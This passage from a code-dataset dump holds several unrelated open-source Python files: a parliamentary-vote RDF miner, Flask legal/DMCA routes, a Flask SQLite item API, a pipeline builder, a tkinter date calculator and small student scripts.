= vote[\"ep_id\"]\n                                else:\n                                    if \"name\" in vote:\n                                        logging.warning(\n                                            \"MEP of vote had no epid. Do they exist? (%s). Attempting to use internal ID\",\n                                            vote[\"name\"],\n                                        )\n                                    voter_id = vote[\"userid\"]\n                            except Exception as ex:\n                                logging.error(\n                                    \"Skipping vote of type %s. No MEP ID found. (%s)\", vote_type, ex\n                                )\n                                failed += 1\n                                continue\n\n                            if self.key_exists(voter_id, self.dict_mep):\n                                voter_uri = URIRef(self.dict_mep[voter_id])\n                            else:\n                                voter_uri = self.id_to_iri(voter_id, prefix=\"mep\")\n\n                            reaction_uri = self.id_to_iri(\n                                report_id + \"_\" + str(voter_id) + \"_\" + vote_type,\n                                prefix=\"reaction\",\n                            )\n                            triples.add((reaction_uri, c.TYPE, c.VOTES[vote_type]))\n                            triples.add((reaction_uri, c.REACTION_TO, vote_uri))\n                            triples.add((reaction_uri, c.REACTION_BY, voter_uri))\n\n                            count += 1\n                else:\n                    logging.warning(\"No vote type found!\")\n        else:\n            logging.warning(\"No report ID found (vote['report']). 
Skipping.\")\n\n return count, failed, triples\n\n def convert_votes(self, path, num_threads, limit):\n start = timer()\n total_success = 0\n total_failed = 0\n num_triples = 0\n counter = 0\n\n selected_votes = io.get_dataset_indexes(path, limit)\n\n print(fmt.WAIT_SYMBOL, \"Mining votes...\")\n\n try:\n pool = multiprocessing.Pool(num_threads)\n\n results = pool.map(self.process_votes, selected_votes)\n\n dataset = DatasetGenerator.get_dataset()\n for result in results:\n count, failed, triples = result\n total_failed += failed\n total_success += count\n num_triples += len(triples)\n\n counter += 1\n\n for triple in triples:\n try:\n dataset.add((triple[0], triple[1], triple[2]))\n except AssertionError as e:\n print(e, triple)\n return False\n\n if not self.debug:\n if (counter % 100) == 0 and counter != 0:\n # reset dataset\n if not self.sparql_endpoint.import_dataset(dataset):\n return False\n\n print(fmt.INFO_SYMBOL, total_success, \"votes imported.\")\n dataset = DatasetGenerator.get_dataset()\n\n if not self.debug:\n # Import any left over from the last (incomplete) batch\n if not self.sparql_endpoint.import_dataset(dataset):\n return False\n\n print(fmt.OK_SYMBOL, \"Total of\", total_success, \"votes imported.\")\n\n if total_failed > 0:\n print(\n fmt.WARNING,\n \"%i out of %i votes had no MEP ID and have been excluded.\"\n % (total_failed, total_success + total_failed),\n )\n\n finally:\n pool.close()\n pool.join()\n\n end = timer()\n\n return num_triples, total_success, get_elapsed_seconds(start, end)\n","repo_name":"chadsr/MAD-EUParl","sub_path":"miner/miner.py","file_name":"miner.py","file_ext":"py","file_size_in_byte":37617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"14083598024","text":"from flask import *\nfrom os import environ\nimport requests\nfrom werkzeug.utils import secure_filename\nimport mistletoe\n\nfrom ruqqus.helpers.get import *\nfrom ruqqus.helpers.wrappers import *\nfrom ruqqus.helpers.markdown import CustomRenderer\nfrom ruqqus.helpers.sanitize import *\nfrom ruqqus.mail.mail import send_mail\nfrom ruqqus.__main__ import app, limiter\n\n\n@app.route(\"/legal\", methods=[\"GET\"])\n@auth_desired\ndef legal_1(v):\n return render_template(\"legal/legal.html\", v=v)\n\n\n@app.route(\"/legal/2\", methods=[\"POST\"])\n@is_not_banned\n@validate_formkey\ndef legal_2(v):\n\n if request.form.get(\"username\") != v.username:\n abort(422)\n\n if request.form.get(\"about_yourself\", \"\") not in [\n \"law_enforcement\", \"gov_official\"]:\n return render_template(\"legal/legal_reject.html\", v=v)\n\n req_type = request.form.get(\"request_type\", \"\")\n\n if req_type == \"user_info_baseless\":\n return render_template(\"legal/legal_reject2.html\", v=v)\n elif req_type == \"user_info_emergency\":\n return render_template(\"legal/legal_emergency.html\", v=v)\n elif req_type == \"post_takedown\":\n return render_template(\"legal/legal_takedown.html\", v=v)\n elif req_type == \"user_info_legal\":\n return render_template(\"legal/legal_user.html\", v=v)\n elif req_type == \"data_save\":\n return render_template(\"legal/legal_infosave.html\", v=v)\n else:\n abort(400)\n\n\n@app.route(\"/legal/final\", methods=[\"POST\"])\n@is_not_banned\n@validate_formkey\ndef legal_final(v):\n\n if request.form.get(\"username\") != v.username:\n abort(422)\n\n data = [(x, request.form[x]) for x in request.form if x != \"formkey\"]\n\n data = sorted(data, key=lambda x: x[0])\n\n files = {\n secure_filename(\n 
request.files[x].filename): request.files[x] for x in request.files}\n\n try:\n send_mail(environ.get(\"admin_email\"),\n \"Legal request submission\",\n render_template(\"email/legal.html\",\n data=data),\n files=files\n )\n except BaseException:\n return render_template(\"legal/legal_done.html\",\n success=False,\n v=v)\n\n return render_template(\"legal/legal_done.html\",\n success=True,\n v=v)\n\n\n@app.route(\"/help/dmca\", methods=[\"POST\"])\n@is_not_banned\n@validate_formkey\ndef dmca_post(v):\n\n data = {x: request.form[x] for x in request.form if x != \"formkey\"}\n\n email_text = render_template(\"help/dmca_email.md\", v=v, **data)\n\n with CustomRenderer() as renderer:\n email_html = renderer.render(mistletoe.Document(email_text))\n email_html = sanitize(email_html, linkgen=True)\n\n try:\n send_mail(environ.get(\"admin_email\"),\n \"DMCA Takedown Request\",\n email_html\n )\n except BaseException:\n return render_template(\"/help/dmca.html\",\n error=\"Unable to save your request. Please try again later.\",\n v=v)\n\n post_text = render_template(\"help/dmca_notice.md\", v=v, **data)\n with CustomRenderer() as renderer:\n post_html = renderer.render(mistletoe.Document(post_text))\n post_html = sanitize(post_html, linkgen=True)\n\n # create +RuqqusDMCA post\n new_post = Submission(author_id=1,\n domain_ref=None,\n board_id=1000,\n original_board_id=1000,\n over_18=False,\n post_public=True,\n repost_id=None,\n is_offensive=False\n )\n\n g.db.add(new_post)\n g.db.flush()\n\n new_post_aux = SubmissionAux(id=new_post.id,\n url=None,\n body=post_text,\n body_html=post_html,\n embed_url=None,\n title=f\"DMCA {new_post.base36id}\"\n )\n\n g.db.add(new_post_aux)\n g.db.flush()\n\n comment_text = f\"##### Username\\n\\n@{v.username}\\n\\n##### Email\\n\\n{v.email}\\n\\n##### Address\\n\\n{data['your_address']}\"\n with CustomRenderer() as renderer:\n c_html = renderer.render(mistletoe.Document(comment_text))\n c_html = sanitize(c_html, linkgen=True)\n\n c = Comment(author_id=1,\n parent_submission=new_post.id,\n parent_fullname=new_post.fullname,\n parent_comment_id=None,\n level=1,\n over_18=False,\n is_nsfl=False,\n is_op=True,\n is_offensive=False,\n original_board_id=1000,\n deleted_utc=int(time.time())\n )\n g.db.add(c)\n g.db.flush()\n\n c_aux = CommentAux(\n id=c.id,\n body_html=c_html,\n body=comment_text\n )\n\n g.db.add(c_aux)\n g.db.commit()\n\n return render_template(\"/help/dmca.html\",\n msg=\"Your request has been saved.\",\n v=v)\n\n\n@app.route(\"/help/counter_dmca\", methods=[\"POST\"])\n@is_not_banned\n@validate_formkey\ndef counter_dmca_post(v):\n\n data = [(x, request.form[x]) for x in request.form if x != \"formkey\"]\n data.append((\"username\", v.username))\n data.append((\"email\", v.email))\n\n data = sorted(data, key=lambda x: x[0])\n try:\n send_mail(environ.get(\"admin_email\"),\n \"DMCA Counter Notice\",\n render_template(\"email/counter_dmca.html\",\n data=data),\n plaintext=str(data)\n )\n except BaseException:\n return render_template(\"/help/counter_dmca.html\",\n error=\"Unable to save your request. 
Please try again later.\",\n v=v)\n\n return render_template(\"/help/counter_dmca.html\",\n msg=\"Your request has been saved.\",\n v=v)\n","repo_name":"Butonix/ruqqus-1","sub_path":"ruqqus/routes/legal.py","file_name":"legal.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"5151743508","text":"import tkinter\nfrom tkinter import ttk\nimport datetime as dt\nfrom tkinter.messagebox import *\n\ngui = tkinter.Tk()\ngui.title(\"DaysByDays\")\ngui.geometry(\"600x300\")\ngui.configure(bg=\"gray\")\n\nx = dt.date.today()\nprint(x)\nvar1 = tkinter.StringVar(value=x.strftime(\"%d\"))\nvar2 = tkinter.StringVar(value=x.strftime(\"%B\"))\nvar3 = tkinter.StringVar(value=x.year)\ncombobox1 = ttk.Combobox(gui, textvariable=var1,values=(\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\",\"11\",\"12\",\"13\",\"14\",\"15\",\"16\",\"17\",\"18\",\"19\",\"20\",\"21\",\"22\",\"23\",\"24\",\"25\",\"26\",\"27\",\"28\",\"29\",\"30\",\"31\"),state=\"readonly\") \ncombobox2 = ttk.Combobox(gui, textvariable=var2,values=(\"January\", \"February\",\"March\",\"April\",\"May\",\"June\",\"July\",\"August\",\"September\",\"Oktober\",\"November\",\"December\"),state=\"readonly\")\ncombobox3 = ttk.Combobox(gui, textvariable=var3,values=(\"2000\",\"2001\",\"2002\",\"2003\",\"2004\",\"2005\",\"2006\",\"2007\",\"2008\",\"2009\",\"2010\",\"2011\",\"2012\",\"2013\",\"2014\",\"2015\",\"2016\",\"2017\",\"2018\",\"2019\",\"2020\",\"2021\",\"2022\",\"2023\",\"2024\",\"2025\",\"2026\",\"2027\",\"2028\",\"2029\",\"2030\"),state=\"readonly\")\ncombobox1.pack()\ncombobox2.pack()\ncombobox3.pack()\ncombobox1.place(rely=.5, relx=.100, anchor=\"w\")\ncombobox2.place(rely=.5, relx=.50, anchor=\"center\")\ncombobox3.place(rely=.5, relx=.9, anchor=\"e\")\ndef calculate():\n day = int(var1.get())\n month = str(var2.get())\n year = int(var3.get())\n global number, textInfo\n dayPicked = int(day)\n monthPicked = month\n yearPicked = int(year)\n monthNumber = int(dt.datetime.strptime(monthPicked, \"%B\").month)\n today = x\n datePicked = dt.date(yearPicked, monthNumber, dayPicked)\n difference = datePicked - today\n number = difference.days\n if number > 0:\n if number == 1:\n textInfo = \"This is \" + str(number) + \" day in the future\"\n else:\n textInfo = \"This is \" + str(number) + \" days in the future\"\n elif number < 0:\n if -number == 1:\n textInfo = \"This was \" + str(-number) + \" day ago\"\n else:\n textInfo = \"This was \" + str(-number) + \" days ago\"\n else:\n textInfo = \"This is today\"\nGoButton = tkinter.Button(\n gui,\n text=\"Go\",\n bg=\"blue\",\n fg=\"white\",\n activebackground=\"lightgreen\",\n command=lambda:[calculate(),showinfo(title=\"tijdverschil\",message=textInfo)])\nGoButton.pack()\nGoButton.place(rely=.7 ,relx=.5 ,anchor=\"s\")\ngui.mainloop()","repo_name":"Jeroen-dH/gui-formulieren","sub_path":"DaysByDays.py","file_name":"DaysByDays.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25300150086","text":"import re\r\n\r\nakhir = ('Terima kasih telah berbelanja di NFElectrics')\r\ntotal_barang = 0\r\ntotal_harga= 0\r\n\r\nwhile True:\r\n barang = input(\"Masukkan nama produk yang dibeli atau X untuk selesai:\")\r\n if (barang != \"X\"):\r\n harga = float(input(\"Harga barang:\"))\r\n print(\"Berhasil menambahkan\", barang, \"dengan harga\", harga)\r\n total_barang = total_barang + 1\r\n 
else:\r\n break\r\n total_harga = total_harga + harga\r\nprint(\"\")\r\nprint(\"Total produk yang dibeli:\", total_barang,\r\n \"\\n\" + \"Total harga produk:\", total_harga, \"\\n\")\r\n\r\nif total_barang != 0:\r\n anggota = input('Apakah anda anggota? (Y/T):')\r\n if anggota == 'Y':\r\n Pattern = (\"^\\w+@\\w+\\.+com+$\")\r\n def checkEmail(address):\r\n if (re.search(Pattern, address)):\r\n return address\r\n while True: \r\n email = input('Masukkan email:')\r\n if not checkEmail(email):\r\n print('Email tidak valid. Ulangi.')\r\n else:\r\n True\r\n break\r\n\r\n pola = (\"^(?=.*?[A-Z])(?=.*?[a-z])(?=.*?[0-9])(?=.*?[#!@$]).{8,}$\")\r\n def checkPass(pwd):\r\n if (re.search(pola, pwd)):\r\n return pwd\r\n while True: \r\n sandi = input('Masukkan Password:')\r\n if not checkPass(sandi):\r\n print('Email tidak valid. Ulangi.')\r\n else:\r\n True\r\n break\r\n\r\n while True:\r\n peserta = input('Masukkan level kepesertaan Anda:')\r\n diskon_10 = ('10%')\r\n diskon_15 = ('15%')\r\n diskon_5 = ('5%')\r\n diskon_20 = ('20%')\r\n if peserta == \"Gold\":\r\n if total_barang < 5:\r\n diskon = total_harga * (10/100)\r\n sesudah_diskon = total_harga - diskon\r\n print('Selamat! Anda mendapat potongam harga', diskon_10)\r\n print('Total harga yang harus dibayar:', sesudah_diskon)\r\n print(akhir)\r\n break\r\n else:\r\n diskon = total_harga * (15/100)\r\n sesudah_diskon = total_harga - diskon\r\n print('Selamat! Anda mendapat potongam harga', diskon_15)\r\n print('Total harga yang harus dibayar:', sesudah_diskon)\r\n print(akhir)\r\n break\r\n elif peserta == \"Silver\":\r\n if total_barang < 5:\r\n diskon = total_harga * (5/100)\r\n sesudah_diskon = total_harga - diskon\r\n print('Selamat! Anda mendapat potongam harga', diskon_5)\r\n print(sesudah_diskon)\r\n print(akhir)\r\n break\r\n else:\r\n diskon = total_harga * (10/100)\r\n sesudah_diskon = total_harga - diskon\r\n print('Selamat! Anda mendapat potongam harga', diskon_10)\r\n print(sesudah_diskon)\r\n print(akhir)\r\n break\r\n elif peserta == \"Diamond\":\r\n if total_barang < 5:\r\n diskon = total_harga * (15/100)\r\n sesudah_diskon = total_harga - diskon\r\n print('Selamat! Anda mendapat potongam harga', diskon_15)\r\n print(sesudah_diskon)\r\n print(akhir)\r\n break\r\n else:\r\n diskon = total_harga * (20/100)\r\n sesudah_diskon = total_harga - diskon\r\n print('Selamat! Anda mendapat potongam harga', diskon_20)\r\n print(sesudah_diskon)\r\n print(akhir)\r\n break\r\n else:\r\n print('Masukkan tidak valid. 
Ulangi')\r\n continue\r\n else:\r\n print('Total harga yang harus anda bayar:', total_harga, \r\n \"\\n\" + akhir)","repo_name":"syifasukmaa/python","sub_path":"SIDAG/Tugas1_SI06_0110121102.py","file_name":"Tugas1_SI06_0110121102.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1533190390","text":"# team 159\n\nfrom sys import stdin\n\nN, M = [int(i) for i in stdin.readline().strip().split()]\n\nbadwords, answers = [], []\nequiv = {\n '0': 'O', \n '1': 'L', \n '2': 'Z', \n '3': 'E', \n '5': 'S', \n '6': 'B', \n '7': 'T', \n '8': 'B'\n}\n\nfor i in range(N):\n badwords.append(stdin.readline().strip())\nfor i in range(M):\n word = stdin.readline().strip()\n word = \"\".join(list(map(lambda x: equiv[x] if x in equiv else x, list(word))))\n hasBad = False\n for j in range(N):\n if badwords[j] in word:\n answers.append(\"INVALID\")\n hasBad = True\n break\n if not hasBad:\n answers.append(\"VALID\")\n\nfor i in answers:\n print(i)\n\n","repo_name":"sshamani/ICPC-ACM-Programming-Contest","sub_path":"Pacific North West - 2019/U.py","file_name":"U.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"27440696061","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"hcpa-biomed-processing\",\n version=\"1.0.2\",\n author=\"Rafael de Freitas\",\n author_email=\"dfr.rafael@gmail.com\",\n description=\"Apply color deconvolution and threshold on selected images\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/RafaelFreita/hcpa-image-processing\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires=\">=3.6\",\n install_requires=[\"numpy\", \"matplotlib\", \"Pillow\", \"scikit-image\", \"easygui\"],\n)","repo_name":"RafaelFreita/hcpa-image-processing","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72632116262","text":"import uuid\nfrom itertools import tee\n\nfrom hydra.data import ParallelData, Data\nfrom hydra.runners.base import Runner\nimport prefect\nimport cloudpickle\nfrom hydra.runners.shell import ShellRunner\n\nfrom hydra.tool import ExecuteCommand, Command\nfrom typing import List, Union, Dict\n\n\nclass TransformTicket:\n def __init__(self, id, transform, map=False, data=None, tasks=None):\n self.id = id\n self.data = data\n self.tasks = tasks\n self.transform = transform\n self.map = map\n\n\nclass PipelineBuilder:\n def __init__(self, name=None, pipeline=None, default_runner=ShellRunner):\n if not pipeline and not name:\n raise Exception(\"Must provide a name for the Pipeline\")\n if not pipeline:\n pipeline = Pipeline(name)\n\n self._pipeline = pipeline\n self._transform_flow = prefect.Flow(self._pipeline.name + \"_transforms\")\n self._lineage = {}\n self.default_runner = default_runner\n\n def add_command(self,\n data: Union[Data, ParallelData]=None,\n cmd: Command=None,\n runner: Runner=None,\n upstream_transforms: List=None,\n downstream_transforms: List=None,\n **kwargs):\n upstream_tasks = None\n downstream_tasks = 
None\n if upstream_transforms:\n upstream_tasks = [self._lineage[i.id].tasks for i in upstream_transforms]\n if downstream_transforms:\n downstream_tasks = [self._lineage[i.id].tasks for i in downstream_transforms]\n\n if not kwargs:\n kwargs = {}\n\n if data:\n kwargs.update(data.mapping)\n\n if not runner:\n runner = self.default_runner\n\n task = ExecuteCommand(runner=runner, command=cmd)\n\n task = self._pipeline.add_task(\n task, upstream_tasks=upstream_tasks, downstream_tasks=downstream_tasks, **kwargs)\n\n ticket = self._add_transform(task, upstream_transforms, downstream_transforms, **kwargs)\n ticket.map = False\n ticket.data = data\n ticket.tasks = task\n\n self._lineage[ticket.id] = ticket\n\n return ticket\n\n def map_command(self,\n data: Union[Data, ParallelData]=None,\n cmd: Command=None,\n runner: Runner=None,\n iterables: Dict=None,\n upstream_transforms: List=None,\n downstream_transforms: List=None,\n **kwargs):\n upstream_tasks = None\n downstream_tasks = None\n if upstream_transforms:\n upstream_tasks = [self._lineage[i.id].tasks for i in upstream_transforms]\n if downstream_transforms:\n downstream_tasks = [self._lineage[i.id].tasks for i in downstream_transforms]\n\n if not kwargs:\n kwargs = {}\n\n if not iterables:\n iterables = {}\n\n if data:\n iterables.update(data.mapping)\n\n if not runner:\n runner = self.default_runner\n\n task = ExecuteCommand(runner=runner, command=cmd)\n\n tasks = self._pipeline.map_task(\n task, iterables=iterables, upstream_tasks=upstream_tasks, downstream_tasks=downstream_tasks, **kwargs)\n\n keys = iterables.keys()\n kwargs.update(dict.fromkeys(keys))\n ticket = self._add_transform(task, upstream_transforms, downstream_transforms, **kwargs)\n ticket.map = True\n ticket.data = data\n ticket.tasks = tasks\n\n self._lineage[ticket.id] = ticket\n return ticket\n\n def _add_transform(self, task, upstream_transforms=None, downstream_transforms=None, **kwargs):\n upstream_tasks = None\n downstream_tasks = None\n if downstream_transforms:\n downstream_tasks = [i.transform for i in downstream_transforms]\n if upstream_transforms:\n upstream_tasks = [i.transform for i in upstream_transforms]\n with self._transform_flow as flow:\n result = task(**kwargs)\n if upstream_tasks or downstream_tasks:\n result.set_dependencies(upstream_tasks=upstream_tasks, downstream_tasks=downstream_tasks)\n ticket = TransformTicket(id=\"{name}-{id}\".format(name=task.name, id=uuid.uuid4()),\n transform=result)\n\n return ticket\n\n def add_task(self,\n task,\n data: Union[Data, ParallelData]=None,\n upstream_transforms: List=None,\n downstream_transforms: List=None,\n **kwargs):\n upstream_tasks = None\n downstream_tasks = None\n if upstream_transforms:\n upstream_tasks = [self._lineage[i.id].tasks for i in upstream_transforms]\n if downstream_transforms:\n downstream_tasks = [self._lineage[i.id].tasks for i in downstream_transforms]\n\n if not kwargs:\n kwargs = {}\n\n if data:\n kwargs.update(data.mapping)\n\n task = self._pipeline.add_task(\n task, upstream_tasks=upstream_tasks, downstream_tasks=downstream_tasks, **kwargs)\n\n ticket = self._add_transform(task, upstream_transforms, downstream_transforms, **kwargs)\n ticket.map = False\n ticket.data = data\n ticket.tasks = task\n\n self._lineage[ticket.id] = ticket\n\n return ticket\n\n def map_task(self,\n task,\n data: Union[Data, ParallelData]=None,\n iterables: Dict=None,\n upstream_transforms=None,\n downstream_transforms=None,\n **kwargs):\n upstream_tasks = None\n downstream_tasks = None\n if 
upstream_transforms:\n upstream_tasks = [self._lineage[i.id].tasks for i in upstream_transforms]\n if downstream_transforms:\n downstream_tasks = [self._lineage[i.id].tasks for i in downstream_transforms]\n\n if not kwargs:\n kwargs = {}\n\n if not iterables:\n iterables = {}\n\n if data:\n iterables.update(data.mapping)\n\n tasks = self._pipeline.map_task(task, iterables, upstream_tasks, downstream_tasks, **kwargs)\n\n kwargs.update(iterables)\n ticket = self._add_transform(task, upstream_transforms, downstream_transforms, **kwargs)\n ticket.map = True\n ticket.data = data\n ticket.tasks = tasks\n\n self._lineage[ticket.id] = ticket\n return ticket\n\n def visualize_transforms(self):\n self._transform_flow.visualize()\n\n def visualize_tasks(self):\n self._pipeline.visualize()\n\n\nclass Pipeline:\n def __init__(self, name):\n self.name = name\n self._flow = prefect.Flow(name)\n\n def run(self, state=None, **kwargs):\n state = self._flow.run(**kwargs)\n with open(\"result.hydra\", \"wb\") as f:\n cloudpickle.dump(state, f)\n return state\n\n def add_task(self,\n task: prefect.Task = None,\n upstream_tasks: List=None,\n downstream_tasks: List=None,\n **kwargs) -> TransformTicket:\n \"\"\" \"\"\"\n with self._flow as f:\n result = task(**kwargs)\n if upstream_tasks or downstream_tasks:\n result.set_dependencies(upstream_tasks=upstream_tasks, downstream_tasks=downstream_tasks)\n return result\n\n\n def map_task(self, task, iterables: Dict=None, upstream_tasks=None, downstream_tasks=None, **kwargs):\n\n keys = list(iterables.keys())\n if len(keys) > 1:\n collections = list(iterables.values())\n collections = zip(*collections)\n elif len(keys) == 1:\n collections = list(*iterables.values())\n results = []\n with self._flow as flow:\n for i, data in enumerate(collections):\n params = dict.fromkeys(keys)\n for k, key in enumerate(keys):\n params[key] = data[k]\n if kwargs:\n params.update(kwargs)\n\n result = task(**params)\n if upstream_tasks:\n result.set_dependencies(upstream_tasks=[tasks[i] for tasks in upstream_tasks])\n if downstream_tasks:\n result.set_dependencies(downstream_tasks=[tasks[i] for tasks in downstream_tasks])\n results.append(result)\n return results\n\n\n def visualize(self):\n self._flow.visualize()\n\n","repo_name":"kforti/Hydra","sub_path":"hydra/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":8509,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"26649203907","text":"import sqlite3\nfrom flask_restful import Resource, reqparse\nfrom flask_jwt import jwt_required\n\nclass Item(Resource):\n # used for controlling the input argument from the api request.\n # it allows only required arg to pass through.\n parser = reqparse.RequestParser()\n parser.add_argument('price',type=float,required=True,help=\"This field cannot be left blank!\")\n parser.add_argument('quantity',type=str,required=True,help=\"This field cannot be left blank!\")\n\n\n @classmethod\n def find_by_name(cls,name):\n connection = sqlite3.Connection(\"data.db\")\n cursor = connection.cursor()\n\n query = \"SELECT * FROM items WHERE name=?\"\n result = cursor.execute(query,(name,))\n row = result.fetchone()\n connection.close()\n\n if row:\n return{'item':{'name':row[0],'price':row[1],'quantity':row[2]}}\n\n # require authentication inorder to continue with the below request.\n @jwt_required()\n def get(self,name):\n item = self.find_by_name(name)\n if item:\n return item\n return{'message':\"Item not found\"},404\n \n \n 
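# NOTE: minimal sketch, not part of the original file; it assumes the same 'data.db'\n    # path and 'items' table used by the methods in this class. The connect/close\n    # boilerplate repeated in the methods below could be factored into one context\n    # manager, e.g.:\n    #\n    # from contextlib import contextmanager\n    #\n    # @contextmanager\n    # def item_cursor():\n    #     connection = sqlite3.connect('data.db')  # hypothetical helper, same DB file\n    #     try:\n    #         yield connection.cursor()\n    #         connection.commit()  # persist writes on a clean exit\n    #     finally:\n    #         connection.close()  # always release the connection\n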
def post(self,name):\n\n if self.find_by_name(name):\n return {'Message':f\"This item {name} is already exist\"},400\n\n requestData = Item.parser.parse_args()\n newItem = {\n 'name' : name,\n 'price' : requestData['price'],\n 'quantity' : requestData['quantity']\n }\n try:\n self.insert(newItem)\n except:\n return {\"message\":\"An error occured while trying to insert an item in DB\"},500\n return f\"{newItem} is successfully added to the list\",201\n\n @classmethod\n def insert(cls,item):\n connection = sqlite3.connect('data.db')\n cursor = connection.cursor()\n\n query = \"INSERT INTO items VALUES(?,?,?)\"\n cursor.execute(query,(item['name'],item['price'],item['quantity']))\n\n connection.commit()\n connection.close()\n\n\n def delete(self,name):\n connection = sqlite3.connect('data.db')\n cursor = connection.cursor()\n\n query = \"DELETE FROM items WHERE name=?\"\n cursor.execute(query,(name,))\n\n connection.commit()\n connection.close()\n \n return f\"Item {name} is deleted from DB\"\n\n def put(self,name):\n data = Item.parser.parse_args()\n\n item = self.find_by_name(name)\n updated_item={\"name\":name,\"price\":data['price'],\"quantity\":data['quantity']}\n if item is None :\n try:\n self.insert(updated_item)\n except:\n return {\"message\":\"Error while trying to insert data into DB\"},500\n else:\n try:\n self.update(updated_item)\n except:\n return {\"message\":\"Error while trying to update data into DB\"},500\n\n return updated_item\n\n @classmethod\n def update(cls,item):\n connection = sqlite3.connect('data.db')\n cursor = connection.cursor()\n\n query = \"UPDATE items SET price=?,quantity=? WHERE name=?\"\n cursor.execute(query,(item['price'],item['quantity'],item['name']))\n\n connection.commit()\n connection.close()\n\n\n\nclass ItemList(Resource):\n def get(self):\n connection = sqlite3.connect('data.db')\n cursor = connection.cursor()\n\n query = \"SELECT * FROM items\"\n result = cursor.execute(query)\n\n item = []\n for row in result:\n item.append({\"name\":row[0],\"price\":row[1],\"quantity\":row[2]})\n\n connection.close()\n return {\"item\":item}\n\n ","repo_name":"NavinAJ/FlaskRepository","sub_path":"code/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22461788598","text":"from os import environ\nfrom os.path import join\n\nIN_DOCKER_ENV_VARS = [\n \"CPP_DOCKER\",\n \"FAASM_DOCKER\",\n]\n\n\ndef in_docker():\n \"\"\"\n Work-out wether we are being called from inside a docker container\n\n faasmctl can be invoked both from outside and inside a docker container.\n When invoked from inside a docker container, faasmctl can only be used to\n interact with a cluster running on docker compose. In that case, we need to\n use a different IP for the services in the cluster. Fortunately, Faasm\n sets certain env. vars when running inside a container. This function\n checks for them and returns True if successful\n \"\"\"\n for env_var in IN_DOCKER_ENV_VARS:\n if env_var in environ and environ[env_var] == \"on\":\n return True\n\n return False\n\n\ndef get_docker_tag(faasm_checkout, image_name):\n \"\"\"\n Given an image name, get the docker tag from the `.env` file in Faasm's\n source\n\n Parameters:\n - faasm_checkout (str): path to the local checkout of Faasm\n - image_name (str): image name to find. 
Must be one in\n {CPP,FAASM,PYTHON}_CLI_IMAGE\n\n Returns:\n - A string with the corresponding docker image tag\n \"\"\"\n env_file_path = join(faasm_checkout, \".env\")\n with open(env_file_path, \"r\") as fh:\n env_file = fh.readlines()\n env_file = [line.strip() for line in env_file]\n\n # Get the actual image tag by finding the right line in the file. We are\n # unncesserily loading all the lines, but we don't care\n image_tag = [line.split(\"=\")[1] for line in env_file if line.startswith(image_name)]\n assert len(image_tag) == 1\n image_tag = image_tag[0]\n\n return image_tag\n","repo_name":"faasm/faasmctl","sub_path":"faasmctl/util/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"41969464071","text":"import ast\n\n# su=[ast.literal_eval(i) for i in open('su.txt','r')]#解析数据\nsu = [eval(i) for i in open('su.txt', 'r')] # 解析数据\n\n\ndef xian():\n # 显示全部\n print('*' * 50)\n n = 0\n for i in su:\n print(str(n) + '__' + str(i))\n n += 1\n # print('\\n'.join([str(o) for o in su]))#显示全部\n print('*' * 50)\n\n\ndef xie(name, pwd):\n # 增加账号\n name = name\n pwd = pwd\n f = open('su.txt', 'a')\n f.write(str({'nid': len(su), 'name': name, 'pwd': pwd})) # 写入数据\n f.write('\\n')\n su.append({'nid': str(len(su)), 'name': name, 'pwd': pwd})\n\n\ndef cha(name):\n # 查密码\n for i in su:\n if i['name'] == name:\n return i['pwd']\n\n\ndef genxin():\n # 对数据删除改证,后更新到txt\n f = open('su.txt', 'w')\n f = open('su.txt', 'a')\n for i in su:\n f.write(str(i) + '\\n')\n print('更新成功')","repo_name":"liu100286/pyqt5_zp","sub_path":"存储/HUAISQL.py","file_name":"HUAISQL.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5606630494","text":"#! /usr/bin/python3\n\nimport argparse\nimport configparser\nimport os\nimport re\nimport stat\nimport subprocess\nimport sys\n\n\nLOG_WARNINGS = True\n\nARG_CONFIG_FILE = 'config_file'\nARG_TEMPLATES_DIR = 'templates_dir'\nARG_REFRESH_SCRIPT = 'refresh_script'\n\nC_ = '\\033[0m'\nC_RED = '\\033[31m'\nC_YELLOW = '\\033[33m'\n\ndef print_message(level, msg, suffix, out_file=sys.stdout):\n print('{}: {}. 
